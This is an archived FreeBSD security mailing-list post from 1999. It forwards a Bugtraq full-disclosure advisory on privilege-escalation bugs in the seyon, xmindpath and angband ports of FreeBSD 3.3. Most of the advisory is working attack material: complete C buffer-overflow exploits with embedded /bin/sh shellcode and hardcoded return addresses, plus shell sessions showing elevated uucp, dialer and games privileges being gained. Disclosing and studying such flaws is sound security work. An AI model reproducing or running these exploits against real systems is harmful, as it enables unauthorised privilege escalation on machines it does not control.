Skip site navigation (1)Skip section navigation (2)
Date:      Wed, 1 Dec 1999 09:32:42 -0800
From:      Bill Swingle <unfurl@dub.net>
To:        security@freebsd.org
Cc:        Jordan Hubbard <jkh@freebsd.org>
Subject:   [btellier@USA.NET: Several FreeBSD-3.3 vulnerabilities]
Message-ID:  <19991201093242.A71817@dub.net>

next in thread | raw e-mail | index | archive | help
Ok, so I know these are all vulnerabilities in third party software, and
that the actual problem with each program is not really ours to fix but
each of these problems can be avoided with small changes to the
respective ports. 

FreeBSD vulnerabilities are few and far between, and even fewer are
published on Bugtraq. Having something as simple as this get past us is
really embarassing. It says to the security community at large that
we're not even concerned enough with security to fix these small holes.
We all know that's not true. 

I'm not sure who dropped the ball here, and I'm not pointing fingers. I
just hope that we can pull together in the future to avoid more of this.

(just my .04)

-Bill

----- Forwarded message from Brock Tellier <btellier@USA.NET> -----

X-Mailer: USANET web-mailer (M3.4.0.33)
Date:         Tue, 30 Nov 1999 16:08:29 MST
Reply-To: Brock Tellier <btellier@USA.NET>
From: Brock Tellier <btellier@USA.NET>
Subject:      Several FreeBSD-3.3 vulnerabilities
To: BUGTRAQ@SECURITYFOCUS.COM

Greetings,

RANT
I've given the FreeBSD team about a month to get something official together. 
Maintainers were supposedly contacted, but no progress has been made.  As
promised, here are the goods:

OVERVIEW
Vulnerabilities in seyon, xmindpath and angband can be used to upgrade
privileges.

BACKGROUND
All of the vulnerabilities discussed herein are based on my work on
FreeBSD 3.3-RELEASE. Each of the programs was installed with the
default permissions given when unpacked with sysinstall. 
These permissions are:
-rwxr-sr-x 1 bin dialer 88480 Sep 11 00:55 /usr/X11R6/bin/seyon
-rwsr-xr-x 1 uucp bin 7780 Sep 11 05:15 /usr/X11R6/bin/xmindpath
-r-xr-sr-x 1 bin games 481794 Sep 11 01:10 /usr/X11R6/bin/angband
These programs may be installed on other systems with different
permissions as a result of a version change or a different packing
scheme.

DETAILS
 
Vuln #1 The Seyon Mess
 
To summarize: Seyon was supposedly not meant to run with additional
privileges. There are numerous problems with seyon and I've probably not
found all of them. They are:
 
Buffer Overflows:
 1. $HOME
 2. seyon -emulator $BUF
 3. seyon -modems $BUF
 4. many long text box input string overflows while in program
Input Validation:
 1. seyon will search $PATH for "xterm" and "seyon-emu" and exec with
 fullprivs (as noted in previous advisory)
 2. seyon -emulator /program/to/execute/with/full/privs
  
These privileges might be upgradable to root if you are able to a.
trojan a dialer-writable file or b. use a symlink attack to clobber .rhosts or
similar c. snoop device i/o.
 
Vuln #2 xmindpath

/usr/X11R6/bin/xmindpath (suid uucp by default), contains a buffer
overflow which will allow any user to gain uucp privs. Simply enough:
xmindpath -f $BUF

See my "faxalter" advisory for more info on gaining root w/euid uucp.
 
Vuln #3 fun and egid games
 
Want to impress your friends with the highest tetris score known to man?
 
Gain egid games with a buffer overflow in /usr/X11R6/bin/angband. The
overflows are:
 angband -u$BUF
 angband -d$BUF
 
EXPLOITS
 
Seyon:
I've not written buffer overflow exploits for Seyon since an
equivalent-yield program execution vulnerability exists, but it is
certianly possible. The latter exploit is:
seyon -emulator /program/to/execute
 
Note that you'll have to execute a program that will ignore the args
that seyon passes to it automatically as shown:
 
bash-2.03$ echo 'void main() { system("/usr/bin/id"); }' > id.c
bash-2.03$ gcc -o id id.c
bash-2.03$ seyon -emulator ./id
uid=1000(xnec) gid=1000(xnec) egid=68(dialer) groups=68(dialer),
1000(xnec)
 
xmindpath:
bash-2.03$ ls -la `which xmindpath`; id
-rwsr-xr-x 1 uucp bin 7780 Sep 11 05:15 /usr/X11R6/bin/xmindpath
uid=1000(xnec) gid=1000(xnec) groups=1000(xnec)
bash-2.03$ ./xmindx
FreeBSD xmindpath exploit /path/to/xmindpath -f $RET
Brock Tellier btellier@usa.net
Using addr: 0xbfbfcfa8
bash-2.03$ xmindpath -f $RET
lock open: File name too long
$ id
uid=1000(xnec) euid=66(uucp) gid=1000(xnec) groups=1000(xnec)
$
 
/*
 *
 * FreeBSD 3.3 xmindpath exploit gives euid uucp
 * Compile: gcc -o xmindx xmindx.c
 * Usage: ./xmindx <offset>
 /path/to/mindpath -f $RET
 * Brock Tellier <btellier@usa.net>
 *
 */
 
 
 #include <stdlib.h>
 #include <stdio.h>
 
 char shell[]= /* mudge@l0pht.com */
 "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
 "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
 "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
 "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";
 
 #define EGGLEN 2048
 #define RETLEN 279
 #define ALIGN 3
 #define NOP 0x90

 int main(int argc, char *argv[]) {
 
 long int offset=0;
 int i;
 int egglen = EGGLEN;
 int retlen = RETLEN;
 long int addr = 0xbfbfcfa8;
 char egg[EGGLEN];
 char ret[RETLEN];
  
 if (argc == 2) offset = atoi(argv[1]);
 
 addr=addr + offset;
 
 fprintf(stderr, "FreeBSD xmindpath exploit /path/to/xmindpath -f $RET\n");
 fprintf(stderr, "Brock Tellier btellier@usa.net\n");
 fprintf(stderr, "Using addr: 0x%x\n", addr);
  
 memset(egg,NOP,egglen);
 memcpy(egg+(egglen - strlen(shell) - 1),shell,strlen(shell));
  
 for(i=ALIGN;i< retlen;i+=4)
 *(int *)&ret[i]=addr;
  
 memcpy(egg, "EGG=", 4);
 putenv(egg);
 memcpy(ret,"RET=",4);
 putenv(ret);
  
 system("/usr/local/bin/bash");
  
 }
 
 
angband:
 
bash-2.03$ gcc -o angames angames.c
bash-2.03$ angband `./angames`
eip=0xbfbfc6b4 offset=0 buflen=1095
NOPs to 1021
Shellcode to 1088
eip to 1092
garbage to 1094
$ id
uid=1000(xnec) gid=1000(xnec) egid=13(games) groups=13(games), 1000(xnec)
$ 

/* FreeBSD 3.3 angband exploit yields egid of group games
* usage: gcc -o angames angames.c
/path/to/angband `./angames <offset>`
* overflow is 1088bytes of NOP/Shellcode + 4bytes EIP +2bytes garbage
* Brock Tellier <btellier@usa.net>
*/


#include <stdio.h>

char shell[]= /* mudge@lopht.com */
"\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
"\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
"\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
"\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";
 
 
main (int argc, char *argv[] ) {
int x = 0;
int y = 0;
int offset = 0;
int bsize = 1095; /* 2bytes"-u" + overflowed buf's bytes + */
char buf[bsize]; /* 4bytesEBP + 4bytesEIP + 2bytesGarbage */
char arg[bsize + 2];
int eip = 0xbfbfc6b4; /* FreeBSD 3.3 */
 
if (argv[1]) { 
offset = atoi(argv[1]);
eip = eip + offset;
}
fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize);
 
for ( x = 0; x < 1021; x++) buf[x] = 0x90;
fprintf(stderr, "NOPs to %d\n", x);
 
for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y];
fprintf(stderr, "Shellcode to %d\n",x);
 
buf[x++] = eip & 0x000000ff;
buf[x++] = (eip & 0x0000ff00) >> 8;
buf[x++] = (eip & 0x00ff0000) >> 16;
buf[x++] = (eip & 0xff000000) >> 24;
fprintf(stderr, "eip to %d\n",x);
buf[x++] = 'X';
buf[x++] = 'X';
fprintf(stderr, "garbage to %d\n", x);

buf[bsize - 1] = '\0';

sprintf(arg, "-u%s", buf);
arg[bsize + 1] = '\0';
 
printf("%s", arg);
 
}

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA

____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1

----- End forwarded message -----

-- 
-=| --- B i l l   S w i n g l e --- http://www.dub.net/
-=| unfurl@dub.net  - unfurl@freebsd.org - bill@cdrom.com 
-=| Different all twisty a of in maze are you, passages little




To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message




Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?19991201093242.A71817>